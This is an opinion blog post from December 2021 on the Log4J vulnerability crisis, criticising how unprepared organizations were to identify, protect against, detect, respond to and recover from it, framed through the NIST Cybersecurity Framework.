On Log4J — The Duct Tape is Failing

6 min readDec 20, 2021

Prologue

You’re probably not reading this when I release it. In fact, right now if you’re a cyber security professional the odds are high that you’re still running around sleepless and exhausted trying to keep up with the Log4J vulnerability — or vulnerabilities rather — and the many places it could be in your organization.

I want you to know, I feel your pain. I’ve been there. That’s why I’m writing this. I used to work for a mega global company, you can verify that on my LinkedIn profile, and it was the same thing you’re experiencing right now. The difference is, my experience in this madness was in the early 2000’s. It’s absolutely insane to me that very little has changed since then.

Reality Check

I probably don’t need to tell you that the world of IT is on fire, right now. If you’re reading this in 6 months or more, that likely hasn’t changed much. There is a vulnerability in an open-source project that is in use by basically every Java application on the planet that allows for system calls to be made and that turns into someone being able to remotely take control over a system.

Cue the klaxon and flashing red lights.

What is interesting to me, as someone who has been looking at the cyber security space from a strategy and process perspective, is that today’s disaster looks remarkably like the Heartbleed disaster a little while back. Seriously, Heartbleed has its own web page, and a Wikipedia entry. Open source library? Check. Critical component of hundreds of thousands of commercial and open-source software packages? Check! Cyber security teams that have no idea where or if it exists in their environments? Check! What makes this one even more of a dumpster fire is the seemingly never-ending stream of patches that don’t quite work, with the added exploits being released.

This is truly a dumpster fire, filled with baby kittens, rolling down the hill into a gunpowder factory, next to a hospital. When people say it’s bad, it’s bad. It almost feels like we need to coin a new word because this one is soooooooo bad.

99 Problems

Here’s a non-exhaustive list of the things I see are the problems in IT and cyber-security that are once again under the spotlight and microscope. I’m going to align these issues with the NIST CSF, since this is a common language everyone in our industry should speak.

Identify: Whether you’re advocating for the much-needed SBoM (Software Bill of Materials), or something much more simple like a usable asset inventory once thing is clear. Broadly speaking, this is such an emergency of epic proportion because many of the triage going on in enterprise cannot answer the fundamental question: “Are we vulnerable to this, and if so, where?” As a result we’re spending tremendous amounts of energy scanning, analyzing, and asking questions to determine where in our IT the Log4J libraries live. Turns out, it’s in damn near everything from Minecraft (the game), to security tools, to everyday applications, to industrial platforms. Yikes doesn’t even begin to describe the pucker factor here. I would argue that the single biggest problem here is that we have absolutely no definitive way of knowing the totality of our exposure, which is a terrible place to start.
Protect: This part should be simple. If there is a vulnerability in some web content platform, the first thing we should be able to do with relative ease is utilize our deployed Web Application Firewalls (WAFs) to at least stop the obvious exploit attempts and isolate where we’re being targeted. What I’ve seen in various threads is two things going on — first that there are organizations legitimately using the “extended capabilities” of Log4J that’s basically causing the issue so you can’t just block it outright, and that WAFs aren’t widely deployed or we don’t have adequate vendor responses and application of those emergency protections. I guess I’m not shocked by these two developments, but it’s not a great place to be.
Detect: Luckily, detection is rapidly evolving to meet the threat in the wild. Threat detection companies across a wide spectrum are building in detection for both the vulnerability and the exploit triggers and we’re seeing them firing all over the place. Whatever the issue is, cyber security needs to collectively understand that where we are in a detect-and-respond, or “assume breach”, or post-prevention world. If you’re still living under the misguided impression that you can do enough to prevent being breached, you’re a fool. I realize this applies to areas of the vendor space, and I challenge a rebuttal. Oh, also, while I’m typing this, this happened: there may be a worm “ITW” (in the wild) either as I type this, or if this isn’t completely real then surely it’s imminent: https://twitter.com/Laughing_Mantis/status/1472785637006663683
Respond: What is your organization’s response plan? I’m seriously asking you to think about this — at three levels. First at the leadership level, meaning, how you communicate up to your business leadership and the board. We discussed this on The Above Board Show (shameless promotion) in a bit of detail but it’s a difficult fact that many organizations’ CISOs are being summoned to the board room (virtually, probably) to explain the “Are we impacted by this?” request when in fact they should be sending out communication that answers this and other questions while not taking them away from the firefight. Second level is at the peer (horizontal) level. How does the CISO communicate and muster his or her fellow leaders to create a consolidated response across IT? We all know cybersecurity isn’t going to fix this on their own, hell security can’t even find the problems on their own, so they need the development and other IT teams to jump in and help. Effective communications is required here but if you as the leaders haven’t built the channels the communications framework now is a terrible time to start — although if you’re starting from six feet down, it’s better than nothing. Effective communication with IT peers is vital, and you absolutely must figure it out — right now or never. Finally, communication at the technical level — with vendors and various other 3rd parties, and among the cybersecurity organization. Having effective technical communication — automated, documented, and well-understood is critical to not having work duplication and unnecessary waste. Additionally, response asks “Now what?” from a strategy and technical level. I could write a book on this, probably, but won’t go too long here. What does your organization need to do, strategically and technically, to effectively communicate the issue, minimize exposure, remediate where possible, and continue to detect and respond as variants, new exploits, and whatever else pops up.
Recover: I feel confident saying that recovery isn’t part of many security organization’s playbooks. Still, far too often, recovery means nuking the system and rebuilding it. Except when the system impacted is a business critical production platform you can’t just readily nuke it. Maybe you have gold images built (update them before re-deploying!), maybe you have other means, but do figure out recovery. This is going to be a long-term thing as this vulnerability moves into background Internet noise, and you find new, vulnerable, and previously unknown Log4j implementations a year or more from now.

My apologies this went so long, but I’m watching colleagues burn through their weekends working, a catastrophic chain of events in getting Log4j patched, and so much buzz about an impending worm that I felt I needed to write this. It’s a disaster, for sure. But it’s a disaster that we did not need to live through like this. This could have been avoided. We could be doing better, but we’re not. And I don’t have a lot of hope that the next time this happens, some other open-source piece of software that’s critical to all software but maintained by a single person in Alaska or something is found to have a critically exploitable flaw, we will be in any better of a position.

What’s This About Duct Tape?

Where I’m going with the duct tape reference is that security organizations in conjunction with the broader IT apparatus have been held together with duct tape with increasing strain. Things work because people put in super-human effort, and the relative influx of disaster-level issues is low. We can physically see — on your peers faces, their LinkedIn posts, and Twitter feeds — the toll this type of issue is taking not just on cybersecurity folks. It’s hitting ALL of IT, and really striking at the business leadership level as well.

The duct tape that holds crisis response, incident handling, and today’s security is failing…and I fear that it’s going to have that zipper effect where the break will accelerate as it goes longer and eventually it’ll all just fall apart. I know, it feels doomsday’ish, but we are close to full chaos and I don’t like how this feels. Please, tell me you think I’m wrong and it’s not that bad.

On Log4J — The Duct Tape is Failing

Prologue

Reality Check

99 Problems

What’s This About Duct Tape?

Written by Rafal Los